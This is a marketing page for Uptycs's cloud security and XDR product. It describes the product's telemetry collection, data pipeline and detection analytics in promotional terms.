BREAKING NEWS: Cross-Cloud Anomaly Detection Engine for Hybrid Cloud Press Release →

Our Approach

The shift up approach to cybersecurity

Structured telemetry
Collect and normalize telemetry close to its source.
Place security analytics processing power in the cloud.
Standards and APIs
Base data models and modes of interoperability on standards, using an API-first approach.
Unified data model
Provide a unified data model and UI for multiple teams and IT environments.
Enable composability, scalability, and interoperability for security controls.

One UI and data model, multiple solutions

Uptycs unified CNAPP and XDR product is built for modern defenders who have a charter to close security observability gaps across their cloud-native infrastructure.

Attack Surfaces
Telemetry sourced from across the modern attack surface
Cloud Providers
Cloud Providers

The most important way to improve cloud security posture is to ensure resources are configured correctly. It’s a task that can be difficult without visibility across cloud accounts. With Uptycs, IT and security teams can inventory cloud assets and resources, identify non-compliant resources, and access evidence needed for remediation — and more.

  • Icon_01
  • Icon_02
  • Icon_03
Cloud Workload
Container Runtime
Cloud Workload
Container Runtime

As organizations adopt new processes and technologies for building and running applications, they require new types of security observability. Uptycs equips modern defenders with the functionality to protect container-based applications, whether run on-premises, or in the cloud—on a VM or in a serverless deployment.

  • Icon_04
  • Icon_05
  • Icon_06
  • Icon_07

When Kubernetes and container deployments scale up, it becomes difficult to inventory and monitor your fleet. To solve your problems around Kubernetes and container workflows, Uptycs offers Kubernetes security posture management (KSPM) to cover a broad range of security use-cases including hardening, compliance, and threat detection.

  • Icon_08
  • Icon_09
  • Icon_10
  • Icon_11
  • Icon_12
Endpoints Host OS
Endpoints Host OS

Developer laptops and other on-premises assets are key targets, containing cloud provider and GitHub credentials. All security tools generate alerts — but only Uptycs eXtended Detection and Response (XDR) streamlines telemetry across modern attack surfaces and gives you comprehensive detection and response capabilities, from the laptop to the cloud.

  • Icon_13
  • Icon_14
  • Icon_15

Uptycs Detection Cloud

A powerful analytics engine and data pipeline

Identity Fabric
Detection Network
Lambda Analytics
Flight Recorder
Threat Correlation
Data Lake
Uptycs Solutions

Data summarizations and visualizations that solve for multiple solutions

  • Cloud-Native Application Protection Platform (CNAPP)
  • Extended Detection and Response
  • Governance, Compliance
    and Audit Evidence
  • Cyber Asset Inventory and Insights
  • Ask Uptycs
How Our Data Pipeline Works

The power of
structured telemetry

Uptycs unified CNAPP and XDR immediately begins ingesting and analyzing telemetry and gives you connected insights across all of your asset classes in the same place. This can be visualized as a data engineering pipeline with three stages; collect, aggregate, and analyze.

Attack Surfaces
Attack Surfaces
Querry Sensors
Query-based Sensors and Connectors
Attack Surfaces
Attack Surfaces
Querry Sensors
Query-based Sensors and Connectors
  • Collect_main
  • Aggregate_Main
  • Analyze_Main
Universal SQL-powered
Sensors and Connectors
  • Tubular and
    Structured Telemetry
Secure TLS-based
  • XDN: X Detection Network for Cohort Analytics
Aggregate Analytics
  • Lambda Analytics
  • Historical Flight Recorder
  • Threat Intel Correlation
  • SQL-powered Data Lake

Telemetry is captured via agent deployment to the host (Osquery) or via native API integrations (Kubequery, Cloudquery) and transferred to Uptycs’ backend using an HTTP TLS connection. The telemetry can be bucketed into two broad areas based on the attack surface:

  • First Grouping: based on osquery’s ability to interface with operating system interfaces such as kaudit, eBPF on Linux, ETW on Windows, and OpenBSM or the security API framework on macOS. Osquery uses these interfaces to collect system call behavior and translate it into a tabular JSON format.
  • Second Grouping: cloudquery and kubequery use native API integrations to ingest data and translate it into a structured table format.

The tabular telemetry can be acted upon while it’s streaming—for real-time correlation and alerting—and once it's been aggregated and stored for reporting and ad hoc historical querying.

Learn more

This is where Uptycs’ speed and scale truly shines. Our eXtended Detection Network (XDN) applies scaling techniques, such as consistent hashing for horizontal scaling based on HTTP and TLS load balancing techniques to reliably spread the load and ingestion of the data. Uptycs backend can concurrently ingest a wide variety of structured telemetry from multiple interfaces. The XDN also facilitates cohort analysis.

Example: telemetry is in flight from a cohort of 1,000 database servers, and anomalous behavior is identified on one of the machines. The anomalous behavior on the single machine is converted into a real-time query that then evaluates the other 999 machines.

Learn more

In the analysis stage, Lambda analytics are used to analyze data while it’s in-flight for near real-time correlation. While in-flight, Uptycs correlates data with a variety of open source threat intel databases and independent research findings from the Uptycs Threat Research Team. Data is partitioned as a function of time and compressed so that the telemetry can be analyzed at scale.

This streaming analytics model allows Uptycs to take each row of structured data and correlate it using event and alert rules to generate signals. Billions of pieces of telemetry are narrowed to thousands of signals.

These signals are correlated into tens of detections, making it possible for humans and automation to see insights and make data-driven decisions as a part of a compliance requirement.

Learn more

See Uptycs in action

Find and remove critical risks in your modern attack surface - cloud, containers, and endpoints - all from a single UI and data model. Let our team of experts show you how.